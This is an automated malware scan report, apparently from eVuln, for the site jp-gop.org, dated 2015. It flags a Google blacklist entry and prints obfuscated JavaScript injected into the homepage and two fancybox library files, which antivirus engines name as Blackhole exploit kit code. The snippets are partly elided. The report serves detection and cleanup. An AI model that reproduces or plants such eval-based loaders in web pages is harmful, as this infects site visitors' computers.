New scan:

Malware Scanner report for jp-gop.org

Malicious/Suspicious/Total urls checked
2/1/11
3 pages have malicious or suspicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "jp-gop.org" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=jp-gop.org

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://jp-gop.org/
200 OK
Content-Length: 17384
Content-Type: text/html
suspicious
Suspicious code found

<script type="text/javascript" language="javascript" > slrodq="fr"+"omCh"+"arCo"+"de";if(document.querySelector)xdrrnt=4;brcq=("32,78,87,80,75,86,7b,81,80,32,85,42,4b,3a,3b,32,8d,1f,1c,32,88,73,84,32,85,86,73,86,7b,75,4f,39,73,7c,73,8a,39,4d,1f,
... 3743 bytes are skipped ...
,76,71,87,83,39,3b,4f,4f,47,47,3b,8d,8f,77,7e,85,77,8d,65,77,86,55,81,81,7d,7b,77,3a,39,88,7b,85,7b,86,77,76,71,87,83,39,3e,32,39,47,47,39,3e,32,39,43,39,3e,32,39,41,39,3b,4d,1f,1c,1f,1c,85,42,4b,3a,3b,4d,1f,1c,8f,1f,1c,8f".split(","));qag=eval;function ujjdk(){beljo=function(){--(top.body)}()}top=document;for(vgwcl=0;vgwcl<brcq["length"];vgwcl+=1){brcq[vgwcl]=-(18)+parseInt(brcq[vgwcl],xdrrnt*4);}try{ujjdk()}catch(xny){uyu=50-50;}if(!uyu)qag(String[slrodq].apply(String,brcq));</script>

http://ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js
200 OK
Content-Length: 93435
Content-Type: text/javascript
clean
http://jp-gop.org/doteasy-under-construction/fancybox/jquery.fancybox.js
200 OK
Content-Length: 4958
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

djh="y";rqxqea="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rqxqea].getElementById("asd"))}()}catch(tdwu){drcaz=function(agdh){agdh="fro"+agdh;for(ksl=0;ksl<djh.length;ksl++){nor+=String[agdh](ftpf(cxdon+(djh[ksl]))-(63));}};};ftpf=(window.eval);cxdon="0x";ldvj=0;try{;}catch(khpy){ldvj=1}if(!ldvj){try{++ftpf(rqxqea)["\x62o"+"d"+djh]}catch(tdwu){mmcdks="^";}djh="5f^a5^b4^ad^a2^b3^a8^ae^ad^5f^a7^a0^ad^b3^6f^78^67^68^5f^ba^4c^49^5f^b5^a0^b1^5f^b2^b3^a0^b3^a8^a2^7c^6
... 3685 bytes are skipped ...
^ab^a4^ad^6b^5f^a4^ad^a3^5f^68^5f^68^7a^4c^49^bc^4c^49^a8^a5^5f^67^ad^a0^b5^a8^a6^a0^b3^ae^b1^6d^a2^ae^ae^aa^a8^a4^84^ad^a0^a1^ab^a4^a3^68^4c^49^ba^4c^49^a8^a5^67^86^a4^b3^82^ae^ae^aa^a8^a4^67^66^b5^a8^b2^a8^b3^a4^a3^9e^b4^b0^66^68^7c^7c^74^74^68^ba^bc^a4^ab^b2^a4^ba^92^a4^b3^82^ae^ae^aa^a8^a4^67^66^b5^a8^b2^a8^b3^a4^a3^9e^b4^b0^66^6b^5f^66^74^74^66^6b^5f^66^70^66^6b^5f^66^6e^66^68^7a^4c^49^4c^49^a7^a0^ad^b3^6f^78^67^68^7a^4c^49^bc^4c^49^bc".split(mmcdks);nor="";drcaz("mCharCode");ftpf(""+nor);}

Antivirus reports:

Avast
JS:Includer-AUU [Trj]
Ad-Aware
JS:Exploit.BlackHole.PG
Ikarus
Exploit.JS.Blacole
nProtect
JS:Exploit.BlackHole.PG
TrendMicro-HouseCall
TROJ_GEN.F47V1216
Comodo
UnclassifiedMalware
Emsisoft
JS:Exploit.BlackHole.PG (B)
McAfee-GW-Edition
JS/Exploit-Blacole.gc
Microsoft
Exploit:JS/Blacole.OF
MicroWorld-eScan
JS:Exploit.BlackHole.PG
Fortinet
JS/Kryptik.HOL!tr
McAfee
JS/Exploit-Blacole.gc
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.PG
VIPRE
Exploit.JS.Blacole.of (v)
AVG
JS/Exploit
Norman
Blacole.WV
GData
JS:Exploit.BlackHole.PG
BitDefender
JS:Exploit.BlackHole.PG

http://jp-gop.org/doteasy-under-construction/fancybox/helpers/jquery.fancybox-media.js
200 OK
Content-Length: 10082
Content-Type: application/javascript
malicious
Malicious code - confirmed by antiviruses (see below)

djh="y";rqxqea="d"+"o"+"c"+"u"+"ment";try{+function(){if(document.querySelector)--(window[rqxqea].getElementById("asd"))}()}catch(tdwu){drcaz=function(agdh){agdh="fro"+agdh;for(ksl=0;ksl<djh.length;ksl++){nor+=String[agdh](ftpf(cxdon+(djh[ksl]))-(63));}};};ftpf=(window.eval);cxdon="0x";ldvj=0;try{;}catch(khpy){ldvj=1}if(!ldvj){try{++ftpf(rqxqea)["\x62o"+"d"+djh]}catch(tdwu){mmcdks="^";}djh="5f^a5^b4^ad^a2^b3^a8^ae^ad^5f^a7^a0^ad^b3^6f^78^67^68^5f^ba^4c^49^5f^b5^a0^b1^5f^b2^b3^a0^b3^a8^a2^7c^6
... 3685 bytes are skipped ...
^ab^a4^ad^6b^5f^a4^ad^a3^5f^68^5f^68^7a^4c^49^bc^4c^49^a8^a5^5f^67^ad^a0^b5^a8^a6^a0^b3^ae^b1^6d^a2^ae^ae^aa^a8^a4^84^ad^a0^a1^ab^a4^a3^68^4c^49^ba^4c^49^a8^a5^67^86^a4^b3^82^ae^ae^aa^a8^a4^67^66^b5^a8^b2^a8^b3^a4^a3^9e^b4^b0^66^68^7c^7c^74^74^68^ba^bc^a4^ab^b2^a4^ba^92^a4^b3^82^ae^ae^aa^a8^a4^67^66^b5^a8^b2^a8^b3^a4^a3^9e^b4^b0^66^6b^5f^66^74^74^66^6b^5f^66^70^66^6b^5f^66^6e^66^68^7a^4c^49^4c^49^a7^a0^ad^b3^6f^78^67^68^7a^4c^49^bc^4c^49^bc".split(mmcdks);nor="";drcaz("mCharCode");ftpf(""+nor);}

Antivirus reports:

Avast
JS:Includer-AUU [Trj]
Ad-Aware
JS:Exploit.BlackHole.PG
Ikarus
Exploit.JS.Blacole
nProtect
JS:Exploit.BlackHole.PG
TrendMicro-HouseCall
TROJ_GEN.F47V1216
Comodo
UnclassifiedMalware
Emsisoft
JS:Exploit.BlackHole.PG (B)
McAfee-GW-Edition
JS/Exploit-Blacole.gc
Microsoft
Exploit:JS/Blacole.OF
MicroWorld-eScan
JS:Exploit.BlackHole.PG
Fortinet
JS/Kryptik.HOL!tr
McAfee
JS/Exploit-Blacole.gc
NANO-Antivirus
Trojan.Script.Expack.chwlwn
F-Secure
JS:Exploit.BlackHole.PG
VIPRE
Exploit.JS.Blacole.of (v)
AVG
JS/Exploit
Norman
Blacole.WV
GData
JS:Exploit.BlackHole.PG
BitDefender
JS:Exploit.BlackHole.PG

http://jp-gop.org/test404page.js
HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 27 Feb 2015 14:52:18 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 124
Content-Type: text/html
clean
http://templates.doteasy.com/errorpages/error404/
200 OK
Content-Length: 10599
Content-Type: text/html
clean
http://templates.doteasy.com/errorpages/error404/js/selectBox/jquery.selectBox.min.js
200 OK
Content-Length: 12728
Content-Type: application/x-javascript
clean
http://jp-gop.org/js/jquery.watermark.min.js
HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 27 Feb 2015 14:52:21 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 124
Content-Type: text/html
clean
http://templates.doteasy.com/test404page.js
404 Not Found
Content-Length: 1245
Content-Type: text/html
clean
http://jp-gop.org/js/fancybox/jquery.fancybox.js
HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 27 Feb 2015 14:52:22 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 124
Content-Type: text/html
clean
http://jp-gop.org/js/fancybox/helpers/jquery.fancybox-media.js
HTTP/1.1 404 Not Found
Connection: close
Date: Fri, 27 Feb 2015 14:52:22 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 124
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: jp-gop.org

Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 27 Feb 2015 14:52:16 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 17384
Content-Type: text/html
Last-Modified: Tue, 10 Sep 2013 13:28:37 GMT

...17384 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: jp-gop.org
Referer: http://www.google.com/search?q=jp-gop.org

Result:
The result is similar to the first query. There are no suspicious redirects found.